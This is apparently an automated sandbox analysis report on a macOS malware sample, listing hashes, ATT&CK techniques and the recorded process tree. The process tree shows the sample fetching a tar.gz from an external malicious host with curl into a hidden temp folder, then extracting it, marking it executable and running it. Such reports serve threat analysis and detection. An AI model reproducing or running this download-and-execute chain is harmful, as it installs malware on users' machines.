Analysis

  • max time kernel
    38s
  • max time network
    126s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d

  • Size

    48KB

  • MD5

    f1abdc7426dab256d30da578de73cb9d

  • SHA1

    3219d1b92dada589839cabc5e546561f51ddfe82

  • SHA256

    0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d

  • SHA512

    78b001ec08203b65f38cbc5fa05774b8dfd972f3f8096f5f31132d78906c73d39d59515d51cec0873ca011da68096ae650f6be566eaf3403b2d1ab7cbfa48f53

  • SSDEEP

    1536:cwBxH+LbSTkGJskNYKpfAtcMi7LqK24QIAtAmL:VZ+LbLEjhMcMi7uK21Ttl

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

  • File Permission 1 TTPs

    Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.

  • Resource Forking 1 TTPs 1 IoCs

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

  • Command and Scripting Interpreter 1 TTPs

    Adversaries may abuse Unix shell commands and scripts for execution.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d\""
    1⤵
      PID:484
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d\""
      1⤵
        PID:484
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
        1⤵
          PID:484
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
            2⤵
              PID:485
            • /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
              /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
              2⤵
                PID:485
                • /usr/bin/python
                  /usr/bin/python -
                  3⤵
                    PID:486
                  • /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
                    /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -
                    3⤵
                      PID:486
                      • /usr/bin/curl
                        /usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844739" -o /private/tmp/.mmstmp//stmp.tar.gz
                        4⤵
                          PID:487
                  • /bin/sh
                    sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                    1⤵
                      PID:490
                    • /bin/bash
                      sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                      1⤵
                        PID:490
                      • /usr/bin/tar
                        /usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/
                        1⤵
                          PID:490
                        • /bin/sh
                          sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                          1⤵
                            PID:491
                          • /bin/bash
                            sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                            1⤵
                              PID:491
                            • /bin/chmod
                              /bin/chmod +x /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                              1⤵
                                PID:491
                              • /bin/sh
                                sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                1⤵
                                  PID:492
                                • /bin/bash
                                  sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                  1⤵
                                    PID:492
                                  • /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                    /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                    1⤵
                                      PID:492
                                    • /usr/libexec/xpcproxy
                                      xpcproxy com.apple.nsurlstoraged
                                      1⤵
                                        PID:493
                                      • /usr/libexec/nsurlstoraged
                                        /usr/libexec/nsurlstoraged --privileged
                                        1⤵
                                          PID:493

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • /var/db/nsurlstoraged/dafsaData.bin

                                          Filesize

                                          54KB

                                          MD5

                                          64f469698e53d0c828b7f90acd306082

                                          SHA1

                                          bcc041b3849e1b0b4104ffeb46002207eeac54f3

                                          SHA256

                                          d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

                                          SHA512

                                          a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f